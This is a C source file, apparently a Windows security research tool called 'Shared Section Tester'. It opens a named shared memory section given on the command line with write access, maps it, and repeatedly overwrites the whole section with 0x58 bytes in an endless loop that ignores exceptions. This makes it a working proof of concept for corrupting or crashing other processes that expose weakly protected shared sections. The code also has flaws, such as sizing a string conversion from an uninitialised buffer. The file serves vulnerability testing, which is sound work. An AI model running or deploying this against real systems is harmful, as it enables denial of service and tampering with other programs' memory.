// Shared Section Tester
// by Cesar Cerrudo

#include "stdafx.h"
#include "windows.h"
#include "stdio.h"

typedef struct _SECTION_BASIC_INFORMATION {
  ULONG                   d000;
  ULONG                   SectionAttributes;
  LARGE_INTEGER           SectionSize;
} SECTION_BASIC_INFORMATION;

typedef struct _LSA_UNICODE_STRING {  
	USHORT Length;  
	USHORT MaximumLength; 
	PWSTR Buffer;
} UNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    UNICODE_STRING *ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;        
    PVOID SecurityQualityOfService;  
} OBJECT_ATTRIBUTES;


#define InitializeObjectAttributes( p, n, a, r, s ) { \
    (p)->Length = sizeof( OBJECT_ATTRIBUTES );          \
    (p)->RootDirectory = r;                             \
    (p)->Attributes = a;                                \
    (p)->ObjectName = n;                                \
    (p)->SecurityDescriptor = s;                        \
    (p)->SecurityQualityOfService = NULL;               \
    }

#define InitializeUnicodeStr(p,s) { \
	(p)->Length=wcslen(s)*2;			\
	(p)->MaximumLength =wcslen(s)*2+2;\
	(p)->Buffer =s;					\
    }

typedef DWORD (CALLBACK* NTQUERYSECTION)(HANDLE, DWORD, PVOID,DWORD,DWORD*);
NTQUERYSECTION NtQuerySection;

typedef DWORD (CALLBACK* NTOPENSECTION)(HANDLE*, DWORD,OBJECT_ATTRIBUTES* );
NTOPENSECTION NtOpenSection;

int main(int argc, char* argv[])
{
OBJECT_ATTRIBUTES attributes;
SECTION_BASIC_INFORMATION buff;
HANDLE hMapFile;
LPVOID lpMapAddress;
char * sMap;
DWORD i;
WCHAR wcName[500];
UNICODE_STRING uStr;

HMODULE hL;
hL=LoadLibrary("Ntdll.dll");
NtOpenSection= (DWORD (WINAPI *)(HANDLE*, DWORD, OBJECT_ATTRIBUTES*))GetProcAddress(hL,"NtOpenSection");

if (!argv[1]) {
	printf("Usage: TestSS SharedSectionName\n");
	return 0;
}
else if (strlen(argv[1])>=500) {
		printf("Shared Section name must be less than 500 chars\n");
		return 0;
	}



MultiByteToWideChar(CP_ACP,NULL,argv[1],strlen(argv[1])+1,wcName,wcslen(wcName));
InitializeUnicodeStr(&uStr,wcName);
InitializeObjectAttributes(&attributes, &uStr,NULL, NULL, NULL );	

//hMapFile = OpenFileMapping(SECTION_MAP_WRITE|SECTION_QUERY, FALSE, argv[1]);

NtOpenSection( &hMapFile, SECTION_MAP_WRITE|SECTION_QUERY,  &attributes );
 
if (hMapFile == NULL) { 
    printf("Could not open section.\n"); 
	return 0;
} 
printf("Section opened.\n"); 
 
lpMapAddress = MapViewOfFile(hMapFile, FILE_MAP_WRITE, 0, 0, 0);
 
if (lpMapAddress == NULL) { 
    printf("Could not map section.\n"); 
	return 0;
}
printf("Section mapped.\n"); 

NtQuerySection= (DWORD (WINAPI *)(HANDLE, DWORD, PVOID,DWORD,DWORD*))GetProcAddress(hL,"NtQuerySection");

if (NtQuerySection(hMapFile,0,&buff,sizeof(buff),0)){
    printf("Could not get section size"); 
	return 0;
}

sMap=(char*)lpMapAddress;
printf("Section size: 0x%x\n",buff.SectionSize.QuadPart);
printf("Writing to section.\nPress Ctr+C to quit\n"); 

while(1)
{
	__try{ //sometimes section size is not right
		for (i=0;i<buff.SectionSize.QuadPart ;i++)
			sMap[i]=0x58;
	}__except(EXCEPTION_EXECUTE_HANDLER){continue;}
}

CloseHandle(hMapFile);

return 0;
}
